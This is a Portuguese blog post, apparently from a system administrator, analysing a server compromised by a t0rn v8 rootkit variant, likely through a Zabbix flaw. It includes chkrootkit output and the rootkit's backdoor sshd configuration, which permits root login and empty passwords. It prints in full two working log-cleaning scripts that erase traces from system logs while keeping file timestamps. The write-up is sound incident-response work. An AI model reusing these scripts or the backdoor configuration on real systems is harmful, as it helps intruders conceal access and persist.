linux, Telefonia IP, *BSD's, Segurança

A Suspeita:

Em um servidor usado para “provar” alguns softwares .. um belo dia me deparo com o seguinte retorno do comando ls …

homer:~# ls
ls: unrecognized prefix: do
ls: unparsable value for LS_COLORS environment variable

A prova:

Checando a variável de ambiente LS_COLORS … nada de anormal …

homer:~# echo $LS_COLORS

no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.svgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:

Saída de erro no google :

http://www.google.com.br/search?q=ls%3A+unparsable+value+for+LS_COLORS+environment+variable&ie=utf-8&oe=utf-8&aq=t&rls=com.ubuntu:pt-BR:unofficial&client=firefox-a

E ……..??

Muitas ocorrências sobre comprometimento do servidor …

Executando o software chkrootkit e analisando seus log’s as suspeitas se concretizaram …

Segue o log do chkrootkit executado no servidor:

ROOTDIR is `/’

Checking `amd’… not found

Checking `basename’… not infected

Checking `biff’… not found

Checking `chfn’… not infected

Checking `chsh’… not infected

Checking `cron’… not infected

Checking `crontab’… not infected

Checking `date’… not infected

Checking `du’… not infected

Checking `dirname’… not infected

Checking `echo’… not infected

Checking `egrep’… not infected

Checking `env’… not infected

Checking `find’… not infected

Checking `fingerd’… not found

Checking `gpm’… not found

Checking `grep’… not infected

Checking `hdparm’… not found

Checking `su’… not infected

Checking `ifconfig’… INFECTED

Checking `inetd’… not tested

Checking `inetdconf’… not infected

Checking `identd’… not found

Checking `init’… not infected

Checking `killall’… not infected

Checking `ldsopreload’… not infected

Checking `login’… not infected

Checking `ls’… not infected

Checking `lsof’… not infected

Checking `mail’… not infected

Checking `mingetty’… not found

Checking `netstat’… INFECTED

Checking `named’… not found

Checking `passwd’… not infected

Checking `pidof’… not infected

Checking `pop2′… not found

Checking `pop3′… not found

Checking `ps’… not infected

Checking `pstree’… INFECTED

Checking `rpcinfo’… not infected

Checking `rlogind’… not found

Checking `rshd’… not found

Checking `slogin’… not infected

Checking `sendmail’… not infected

Checking `sshd’… not infected

Checking `syslogd’… not tested

Checking `tar’… not infected

Checking `tcpd’… not infected

Checking `tcpdump’… not infected

Checking `top’… INFECTED

Checking `telnetd’… not found

Checking `timed’… not found

Checking `traceroute’… not infected

Checking `vdir’… not infected

Checking `w’… not infected

Checking `write’… not infected

Checking `aliens’… no suspect files

Searching for sniffer’s logs, it may take a while… nothing found

Searching for HiDrootkit’s default dir… nothing found

Searching for t0rn’s default files and dirs… nothing found

Searching for t0rn’s v8 defaults… Possible t0rn v8 \(or variation\) rootkit installed

Searching for Lion Worm default files and dirs… nothing found

Searching for RSHA’s default files and dir… nothing found

Searching for RH-Sharpe’s default files… nothing found

Searching for Ambient’s rootkit (ark) default files and dirs… nothing found

Searching for suspicious files and dirs, it may take a while…

/lib/init/rw/.mdadm /lib/init/rw/.ramfs

/lib/init/rw/.mdadm

Searching for LPD Worm files and dirs… nothing found

Searching for Ramen Worm files and dirs… nothing found

Searching for Maniac files and dirs… nothing found

Searching for RK17 files and dirs… nothing found

Searching for Ducoci rootkit… nothing found

Searching for Adore Worm… nothing found

Searching for ShitC Worm… nothing found

Searching for Omega Worm… nothing found

Searching for Sadmind/IIS Worm… nothing found

Searching for MonKit… nothing found

Searching for Showtee… Warning: Possible Showtee Rootkit installed

Searching for OpticKit… nothing found

Searching for T.R.K… nothing found

Searching for Mithra… nothing found

Searching for LOC rootkit… nothing found

Searching for Romanian rootkit… /usr/include/file.h /usr/include/proc.h

Searching for Suckit rootkit… nothing found

Searching for Volc rootkit… nothing found

Searching for Gold2 rootkit… nothing found

Searching for TC2 Worm default files and dirs… nothing found

Searching for Anonoying rootkit default files and dirs… nothing found

Searching for ZK rootkit default files and dirs… nothing found

Searching for ShKit rootkit default files and dirs… nothing found

Searching for AjaKit rootkit default files and dirs… nothing found

Searching for zaRwT rootkit default files and dirs… nothing found

Searching for Madalin rootkit default files… nothing found

Searching for Fu rootkit default files… nothing found

Searching for ESRK rootkit default files… nothing found

Searching for rootedoor… nothing found

Searching for ENYELKM rootkit default files… nothing found

Searching for common ssh-scanners default files… nothing found

Searching for suspect PHP files… nothing found

Searching for anomalies in shell history files… nothing found

Checking `asp’… not infected

Checking `bindshell’… not infected

Checking `lkm’… You have 97 process hidden for readdir command

You have 99 process hidden for ps command

chkproc: Warning: Possible LKM Trojan installed

chkdirs: nothing detected

Checking `rexedcs’… not found

Checking `sniffer’… eth0: not promisc and no PF_PACKET sockets

eth1: PF_PACKET(/usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/dhcpd, /usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/ipfm)

eth1:0: PF_PACKET(/usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/dhcpd, /usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/ipfm)

eth1:teste: PF_PACKET(/usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/dhcpd, /usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/ipfm)

eth1:2: PF_PACKET(/usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/dhcpd, /usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/ipfm)

Checking `w55808′… not infected

Checking `wted’… chkwtmp: nothing deleted

Checking `scalper’… not infected

Checking `slapper’… not infected

Checking `z2′… chklastlog: nothing deleted

Checking `chkutmp’… The tty of the following user process(es) were not found

in /var/run/utmp !

! RUID PID TTY CMD

! root 5250 tty3 /sbin/getty 38400 tty3

! root 5253 tty4 /sbin/getty 38400 tty4

! root 5256 tty5 /sbin/getty 38400 tty5

! root 5259 tty6 /sbin/getty 38400 tty6

chkutmp: nothing deleted

Chkrootkit apresentou possível rootkit t0rn v8 \(or variation\) instalado.

E agora José ?

A primeira ação a ser tomada foi tirar o servidor da internet …

A análise:

Procurando por informações sobre a t0rn v8 … a rootkit instala possíveis arquivos no servidor:

/lib/libsh.so/shrs

/lib/libsh.so/shhk

/lib/libsh.so/shhk.pub

/sbin/ttymon

/sbin/ttyload

/sbin/ifconfig

/usr/lib/libsh/.sniff/shp

/usr/lib/libsh/.sniff/shsniff

/usr/lib/libsh/.bashrc

/usr/lib/libsh/shsb

/usr/lib/libsh/hide

/usr/sbin/lsof

/usr/bin/pstree

/usr/bin/find

/usr/bin/top

/usr/bin/dir

/usr/bin/slocate

/usr/bin/md5sum

/bin/ps

/bin/ls

/bin/netstat

/var/tmp/httpd

Como o servidor teve comprometimento de muitos binários essenciais para uma análise. Os dados do servidor comprometido foram analisados em outro servidor.

Com o disco montado em outro servidor, procurando pelos possessíveis arquivos que a rootkit poderia ter instalado, foram encontrados os seguintes artefatos:

# ls /mnt/homer/lib/libsh.so

bash shdcf shhk shhk.pub shrs

# cd /mnt/homer/lib/libsh.so

# file bash

bash: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.1, stripped

# file shdcf

shdcf: ASCII text

# cat shdcf

Port 6969

ListenAddress 0.0.0.0

HostKey /lib/libsh.so/shhk

RandomSeed /lib/libsh.so/shrs

ServerKeyBits 768

LoginGraceTime 600

KeyRegenerationInterval 3600

PermitRootLogin yes

IgnoreRhosts yes

StrictModes yes

QuietMode no

X11Forwarding yes

X11DisplayOffset 10

FascistLogging no

PrintMotd no

KeepAlive yes

SyslogFacility DAEMON

RhostsAuthentication no

RhostsRSAAuthentication yes

RSAAuthentication yes

PasswordAuthentication yes

PermitEmptyPasswords yes

UseLogin no

CheckMail no

# file shhk

shhk: data

# file shhk.pub

shhk.pub: ASCII text, with very long lines

# cat shhk.pub

1024 41 104815528740090300232762682062148731692345617648761884893144749702438178716507602106384467348442332555726272229905090060865518152094220166348851874522827117669256069180699567468232805547620203421525417575684002027686936703327559508891840428578000903598085456851354927023314524854708653799840391129004567592229 root@NoraD

# file shrs

shrs: data

Verificando os arquivos não resta a dúvida que é um servidor ssh

Procurando por mais arquivos que a rootkit poderia ter instalado no servidor ….

# ls /mnt/homer/usr/lib/libsh

hide shsb utilz

# cd /mnt/homer/usr/lib/libsh

# file hide

hide: Bourne-Again shell script text executable

# cat hide

#!/bin/bash

echo ” Linux Hider v2.0 by mave”

echo ” enhanced by me! “

echo “[+] [Shkupi Logcleaner] Removing $1 from the logs…….. .”

echo “”

if [ -f /var/log/maillog ]; then

cat /var/log/maillog | grep -v $1 > /tmp/maillog.xz

touch -acmr /var/log/maillog /tmp/maillog.xz

mv -f /tmp/maillog.xz /var/log/maillog

echo “[+] /var/log/maillog … [done]“

echo “”

fi

if [ -f /var/log/messages ]; then

cat /var/log/messages | grep -v $1 > /tmp/messages.xz

touch -acmr /var/log/messages /tmp/messages.xz

mv -f /tmp/messages.xz /var/log/messages

echo “[+] /var/log/messages … [done]“

sleep 2

echo “”

fi

if [ -f /var/log/secure ]; then

cat /var/log/secure | grep -v $1 > /tmp/secure.xz

touch -acmr /var/log/secure /tmp/secure.xz

mv -f /tmp/secure.xz /var/log/secure

echo “[+] /var/log/secure … [done]“

echo “”

fi

if [ -f /var/log/xferlog ]; then

cat /var/log/xferlog | grep -v $1 > /tmp/xferlog.xz

touch -acmr /var/log/xferlog /tmp/xferlog.xz

mv -f /tmp/xferlog.xz /var/log/xferlog

sleep 2

echo “[+] /var/log/lastlog … [done]“

echo “”

fi

if [ -f /var/log/wtmp ]; then

cat /var/log/wtmp |grep -v $1 > /tmp/wtmp.xz

touch -acmr /var/log/wtmp /tmp/wtmp.xz

mv -f /tmp/wtmp.xz /var/log/wtmp

echo “[+] /var/log/wtmp … [done]“

echo “”

fi

rm -f /tmp/*.xz

echo ” * m i s s i o n a c c o m p l i s h e d *”

echo “”

sleep 2

echo ” p.h.e.e.r S.H.c.r.e.w”

echo “”

sleep 5

exit 1

# file shsb

shsb: Bourne-Again shell script text executable

cat shsb

#!/bin/bash

#

# sauber – by socked [11.02.99]

#

# Usage: sauber

BLK=”

RED=”

GRN=”

YEL=”

BLU=”

MAG=”

CYN=”

WHI=”

DRED=”

DGRN=”

DYEL=”

DBLU=”

DMAG=”

DCYN=”

DWHI=”

RES=”

echo “${BLK}* ${WHI}sauber ${DWHI}by ${WHI}s${BLU}o${DBLU}ck${BLK}ed [${DWHI}07${BLK}.${DWHI}27${BLK}.${DWHI}97${BLK}]${RES}”

if [ $# != 1 ]

then

echo “${BLK}* ${DWHI}Usage${WHI}: “`basename $0`” <${DWHI}string${WHI}>${RES}”

echo ” “

exit

fi

echo “${BLK}*${RES}”

echo “${BLK}* ${DWHI}Cleaning logs.. This may take a bit depending on the size of the logs.${RES}”

WERD=$(/bin/ls -F /var/log | grep -v “/” | grep -v “*” | grep -v “.tgz” | grep -v “.gz” | grep -v “.tar” | grep -v “lastlog” | grep -v “utmp” | grep -v “wtmp” | grep -v “@”)

for fil in $WERD

do

line=$(wc -l /var/log/$fil | awk -F ‘ ‘ ‘{print $1}’)

echo -n “${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}…${RES}”

grep -v $1 /var/log/$fil > new

touch -r /var/log/$fil new

mv -f new /var/log/$fil

newline=$(wc -l /var/log/$fil | awk -F ‘ ‘ ‘{print $1}’)

let linedel=$(($line-$newline))

echo “${WHI}$linedel ${DWHI}lines removed!${RES}”

done

killall -HUP syslogd

echo “${BLK}* ${DWHI}Alles sauber mein Meister !’Q%&@$! ${RES}”

# file utilz/

utilz/: directory

# cd utilz/

# ls

mirk.tgz synscan.tgz

# tar -tvzf mirk.tgz

drwxrwxr-x burim/burim 0 2003-04-06 08:58 mirk/

-rw-rw-r– burim/burim 4320 2001-12-30 08:10 mirk/idents

-rw-rw-r– burim/burim 4320 2001-12-30 08:09 mirk/nicks

-rw-rw-r– burim/burim 2021 2003-04-06 08:57 mirk/realnames

-rwx—— burim/burim 40 2002-02-21 05:19 mirk/mf

-rwx—— burim/burim 268 2002-02-21 05:19 mirk/mfclean

-rwxrwxr-x burim/burim 97845 2002-02-21 05:30 mirk/mirkforce

-rwx—— burim/burim 3232 2002-05-24 06:26 mirk/ethclean

-rwxr-xr-x burim/burim 21924 2003-04-17 01:11 mirk/oidentd

# tar -tvzf synscan.tgz

drwxr-xr-x burim/burim 0 2003-04-06 08:54 synscan/

-rw-r–r– burim/burim 19 2001-02-15 20:58 synscan/ircd.txt

-rw-r–r– burim/burim 81518 1999-01-13 21:44 synscan/libpcap.a

-rw-r–r– burim/burim 13 2000-05-15 18:05 synscan/news.txt

-rw-r–r– burim/burim 165 2003-04-06 08:54 synscan/rpcs.txt

-rwxr-xr-x burim/burim 31232 2003-04-17 01:12 synscan/synscan

-rwxr-xr-x burim/burim 38420 2003-04-17 01:12 synscan/upscan

-rwxr-xr-x burim/burim 3884 2003-04-17 01:12 synscan/numip

-rwxr-xr-x burim/burim 6356 2003-04-17 01:12 synscan/host2ip

-rwxr-xr-x burim/burim 19644 2003-04-06 08:54 synscan/nscan

Nos últimos arquivos analisados temos scripts que fazem o tralho sujo de limpar os arquivos de log’s .. um servidor irc e o synscan (network testing tool and active OS fingerprinter).

Procurando como a rootkit era iniciada no boot do servidor ….

Uma simples verificação no /etc/initab nos mostrou a resposta

# cat /mnt/homer/etc/initab

# /etc/inittab: init(8) configuration.

# $Id: inittab,v 1.91 2002/01/25 13:35:21 miquels Exp $

# The default runlevel.

id:2:initdefault:

# Boot-time system configuration/initialization script.

# This is run first except when booting in emergency (-b) mode.

si::sysinit:/etc/init.d/rcS

# What to do in single-user mode.

~~:S:wait:/sbin/sulogin

# /etc/init.d executes the S and K scripts upon change

# of runlevel.

#

# Runlevel 0 is halt.

# Runlevel 1 is single-user.

# Runlevels 2-5 are multi-user.

# Runlevel 6 is reboot.

l0:0:wait:/etc/init.d/rc 0

l1:1:wait:/etc/init.d/rc 1

l2:2:wait:/etc/init.d/rc 2

l3:3:wait:/etc/init.d/rc 3

l4:4:wait:/etc/init.d/rc 4

l5:5:wait:/etc/init.d/rc 5

l6:6:wait:/etc/init.d/rc 6

# Normally not reached, but fallthrough in case of emergency.

z6:6:respawn:/sbin/sulogin

# What to do when CTRL-ALT-DEL is pressed.

ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now

# Action on special keypress (ALT-UpArrow).

#kb::kbrequest:/bin/echo “Keyboard Request–edit /etc/inittab to let this work.”

# What to do when the power fails/returns.

pf::powerwait:/etc/init.d/powerfail start

pn::powerfailnow:/etc/init.d/powerfail now

po::powerokwait:/etc/init.d/powerfail stop

#

# The “id” field MUST be the same as the last

# characters of the device (after “tty”).

#

# Format:

# :::

#

# Note that on most Debian systems tty7 is used by the X Window System,

#

#

#

SV:123456:respawn:/usr/local/bin/svscanboot

# Loading standard ttys

0:2345:once:/usr/sbin/ttyload

# /sbin/getty invocations for the runlevels.

# so if you want to add more getty’s go ahead but skip tty7 if you run X.

1:2345:respawn:/sbin/getty 38400 tty1

2:23:respawn:/sbin/getty 38400 tty2

3:23:respawn:/sbin/getty 38400 tty3

4:23:respawn:/sbin/getty 38400 tty4

5:23:respawn:/sbin/getty 38400 tty5

6:23:respawn:/sbin/getty 38400 tty6

# Example how to put a getty on a serial line (for a terminal)

#T0:23:respawn:/sbin/getty -L ttyS0 9600 vt100

#T1:23:respawn:/sbin/getty -L ttyS1 9600 vt100

# Example how to put a getty on a modem line.

#T3:23:respawn:/sbin/mgetty -x0 -s 57600 ttyS3

# modem getty.

# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem

# fax getty (hylafax)

# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem

# vbox (voice box) getty

# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6

# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7

# end of /etc/inittab

0:2345:once:/usr/sbin/ttyload # essa linha mágica da rootkit …

Conteúdo do ttyload são dois binários

# file /mnt/homer/usr/sbin/ttyload

/mnt/homer/usr/sbin/ttyload: ASCII text

# cat /mnt/homer/usr/sbin/ttyload

/sbin/ttyload -q >/dev/null 2>&1

/sbin/ttymon >/dev/null 2>&1

# file /mnt/homer/sbin/ttyload

/mnt/homer/sbin/ttyload: ELF 32-bit LSB executable, Intel 80386, version 1, statically linked, corrupted section header size

# file /mnt/homer/sbin/ttymon

/mnt/homer/sbin/ttymon: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, stripped

Mais como?

Bom agora nos resta saber como o servidor foi comprometido …

Pelas datas dos arquivos criados usando o nosso velho amigo “find” para procurar arquivos modificados a partir de um dia antes dos artefatos instalados …

# ls -l /mnt/homer/sbin/ttyload

-rwxr-xr-x 1 122 114 212747 2007-01-30 16:51 /mnt/homer/sbin/ttyload

Criando arquivo de marca para busca com find

# touch -d “26 may 2009 15:30:00″ /tmp/date_marker

# find . -newer /tmp/date_marker -exec ls -l {} \; > > /tmp/arquivos-modificados-a-partir-de-2009-05-26-com-data.txt

Procurando arquivos do mesmo dia e hora dos artefatos:

# grep “2009-05-27 15:..” /tmp/arquivos-modificados-a-partir-de-2009-05-26.txt

drwxr-xr-x 2 root root 4096 2009-05-27 15:30 sbin

drwxr-xr-x 6 root root 4096 2009-05-27 15:30 libsh

-rwxr-xr-x 1 root root 75748 2009-05-27 15:30 find

-rwxr-xr-x 1 root root 58380 2009-05-27 15:30 ifconfig

-rwxr-xr-x 1 root root 77352 2009-05-27 15:30 ls

-rwxr-xr-x 1 root root 22116 2009-05-27 15:30 md5sum

-rwxr-xr-x 1 root root 98188 2009-05-27 15:30 netstat

-rwxr-xr-x 1 root root 65292 2009-05-27 15:30 ps

-rwxr-xr-x 1 root root 14060 2009-05-27 15:30 pstree

-rwxr-sr-x 1 root root 31308 2009-05-27 15:30 slocate

-rwxr-xr-x 1 root root 49636 2009-05-27 15:30 top

-rwxr-xr-x 1 root root 65292 2009-05-27 15:30 ./usr/lib/libsh/.backup/ps

-rwxr-xr-x 1 root root 49636 2009-05-27 15:30 ./usr/lib/libsh/.backup/top

-rwxr-xr-x 1 root root 58380 2009-05-27 15:30 ./usr/lib/libsh/.backup/ifconfig

-rwxr-xr-x 1 root root 98188 2009-05-27 15:30 ./usr/lib/libsh/.backup/netstat

-rwxr-xr-x 1 root root 22116 2009-05-27 15:30 ./usr/lib/libsh/.backup/md5sum

-rwxr-xr-x 1 root root 75748 2009-05-27 15:30 ./usr/lib/libsh/.backup/find

-rwxr-xr-x 1 root root 77352 2009-05-27 15:30 ./usr/lib/libsh/.backup/ls

-rwxr-sr-x 1 root root 31308 2009-05-27 15:30 ./usr/lib/libsh/.backup/slocate

-rwxr-xr-x 1 root root 14060 2009-05-27 15:30 ./usr/lib/libsh/.backup/pstree

lrwxrwxrwx 1 root root 20 2009-05-27 15:30 libncurses.so.4 -> /lib/libncurses.so.5

drwxr-xr-x 2 root root 4096 2009-05-27 15:30 libsh.so

lrwxrwxrwx 1 root root 20 2009-05-27 15:30 ./lib/libncurses.so.4 -> /lib/libncurses.so.5

-rwxr-xr-x 1 root root 677184 2009-05-27 15:30 bash

-rw-r–r– 1 root 114 478 2009-05-27 15:30 shdcf

-rwxr-xr-x 1 root root 677184 2009-05-27 15:30 ./lib/libsh.so/bash

-rw-r–r– 1 root 114 478 2009-05-27 15:30 ./lib/libsh.so/shdcf

-rw-r–r– 1 1003 1003 24748 2009-05-27 15:23 2007.tgz

drwxr-xr-x 7 507 507 12288 2009-05-27 15:30 of

-rwxr-xr-x 1 1003 1003 8509 2009-05-27 15:24 xpl

-rw——- 1 1003 1003 448 2009-05-27 15:32 ./home/zabbix/.bash_history

-rwxr-xr-x 1 1003 1003 8509 2009-05-27 15:24 ./home/zabbix/xpl

-rw-r–r– 1 1003 1003 24748 2009-05-27 15:23 ./home/zabbix/2007.tgz

-rw-r—– 1 root root 0 2009-05-27 15:26 ./var/lib/dpkg/lock

-rw-r–r– 1 www-data www-data 2229 2009-05-27 15:43 7b6767c5dca52161e021bc954faeab5d

-rw-r–r– 1 www-data www-data 2347 2009-05-27 15:08 ba1386c0067dd751785dde2403b32755

-rw-r–r– 1 www-data www-data 2229 2009-05-27 15:43 ./var/www/streber/_tmp/7b6767c5dca52161e021bc954faeab5d

-rw-r–r– 1 www-data www-data 2347 2009-05-27 15:08 ./var/www/streber/_tmp/ba1386c0067dd751785dde2403b32755

-rw-r–r– 1 root root 1354 2009-05-27 15:30 inetd.conf

-rw-r–r– 1 root root 25292 2009-05-27 15:30 ld.so.cache

-rw——- 1 root root 1666 2009-05-27 15:19 shadow-

-rw——- 1 root root 1666 2009-05-27 15:19 ./etc/shadow-

-rw-r–r– 1 root root 25292 2009-05-27 15:30 ./etc/ld.so.cache

-rw-r–r– 1 root root 1354 2009-05-27 15:30 ./etc/inetd.conf

Coisas estranhas no home do usuário Zabbix …

Uma simples busca no google por ”Zabbix + Vulnerability“

http://www.google.com.br/search?hl=pt-BR&client=firefox-a&rls=com.ubuntu%3Apt-BR%3Aunofficial&hs=9cR&q=zabbix+vulnerability&btnG=Pesquisar&meta=

E … ???

Zabbix Privilege Escalation Vulnerability

Some vulnerabilities have been reported in the ZABBIX PHP frontend

Multiple Vulnerabilities in Zabbix Frontend

Zabbix o culpado